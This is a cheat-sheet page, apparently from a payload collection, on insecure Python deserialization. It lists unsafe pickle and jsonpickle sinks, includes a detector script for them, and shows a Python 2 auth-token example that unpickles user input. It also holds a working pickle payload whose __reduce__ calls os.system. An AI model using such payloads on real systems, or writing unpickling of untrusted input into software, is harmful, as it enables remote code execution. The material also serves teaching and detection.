# Python Deserialization
> Python deserialization is the process of reconstructing Python objects from serialized data, commonly done using formats like JSON, pickle, or YAML. The pickle module is a frequently used tool for this in Python, as it can serialize and deserialize complex Python objects, including custom classes.
## Summary
* [Detection](#detection)
* [Pickle](#pickle)
* [References](#references)
## Detection
In Python source code, look for these sinks:
* `cPickle.loads`
* `pickle.loads`
* `_pickle.loads`
* `jsonpickle.decode`
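
A grep for these names misses aliased imports such as `import pickle as p` or `from jsonpickle import decode as jp_decode`. The following sketch is an added example, not part of the original page or the PayloadsAllTheThings project: it resolves import aliases with Python 3's `ast` module and reports calls to the sinks listed above. The names `find_sinks` and `SAMPLE` are hypothetical, and the sample source is constructed for illustration.

```python
import ast

# Sinks from the Detection list above, as (module, function) pairs.
SINKS = {("cPickle", "loads"), ("pickle", "loads"),
         ("_pickle", "loads"), ("jsonpickle", "decode")}

def find_sinks(source, filename="<input>"):
    """Return sorted (line, 'module.func') tuples for calls to a listed sink."""
    tree = ast.parse(source, filename)
    modules = {}  # local name -> imported module   (import pickle as p)
    funcs = {}    # local name -> (module, function) (from pickle import loads)
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            for alias in node.names:
                modules[alias.asname or alias.name] = alias.name
        elif isinstance(node, ast.ImportFrom) and node.module:
            for alias in node.names:
                funcs[alias.asname or alias.name] = (node.module, alias.name)
    hits = []
    for node in ast.walk(tree):
        if not isinstance(node, ast.Call):
            continue
        func, target = node.func, None
        if isinstance(func, ast.Attribute) and isinstance(func.value, ast.Name):
            target = (modules.get(func.value.id), func.attr)  # p.loads(...)
        elif isinstance(func, ast.Name):
            target = funcs.get(func.id)                       # jp_decode(...)
        if target in SINKS:
            hits.append((node.lineno, "%s.%s" % target))
    return sorted(hits)

# Constructed sample input: two aliased sinks and one harmless json.loads call.
SAMPLE = '''\
import pickle as p
from jsonpickle import decode as jp_decode
import json

def load_token(raw):
    return p.loads(raw)

def load_profile(text):
    return jp_decode(text)

def load_config(text):
    return json.loads(text)
'''

if __name__ == "__main__":
    for line, sink in find_sinks(SAMPLE):
        print("line %d: call to %s" % (line, sink))
```

The check is flow-insensitive: it does not follow assignments such as `loader = pickle.loads`, and a hit only marks a call site to review for untrusted input.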
## Pickle
The following code is a simple example of using `cPickle` in order to generate an auth_token which is a serialized User object.
:warning: `import cPickle` will only work on Python 2
```python
import cPickle  # Python 2 only
from base64 import b64encode, b64decode

class User:
    def __init__(self):
        self.username = "anonymous"
        self.password = "anonymous"
        self.rank = "guest"

h = User()
# The token is the pickled User object, base64-encoded
auth_token = b64encode(cPickle.dumps(h))
print("Your Auth Token : {}".format(auth_token))
```
The vulnerability is introduced when a token is loaded from user input.
```python
new_token = raw_input("New Auth Token : ")
token = cPickle.loads(b64decode(new_token))
print "Welcome {}".format(token.username)
```
The Python 2.7 documentation clearly states that pickle should never be used with untrusted sources. Let's create malicious data that will execute arbitrary code on the server.
> The pickle module is not secure against erroneous or maliciously constructed data. Never unpickle data received from an untrusted or unauthenticated source.
```python
import cPickle, os
from base64 import b64encode, b64decode

class Evil(object):
    def __reduce__(self):
        return (os.system, ("whoami",))

e = Evil()
evil_token = b64encode(cPickle.dumps(e))
print("Your Evil Token : {}".format(evil_token))
```
## References
- [Exploiting misuse of Python's "pickle" - Nelson Elhage - March 20, 2011](https://blog.nelhage.com/2011/03/exploiting-pickle/)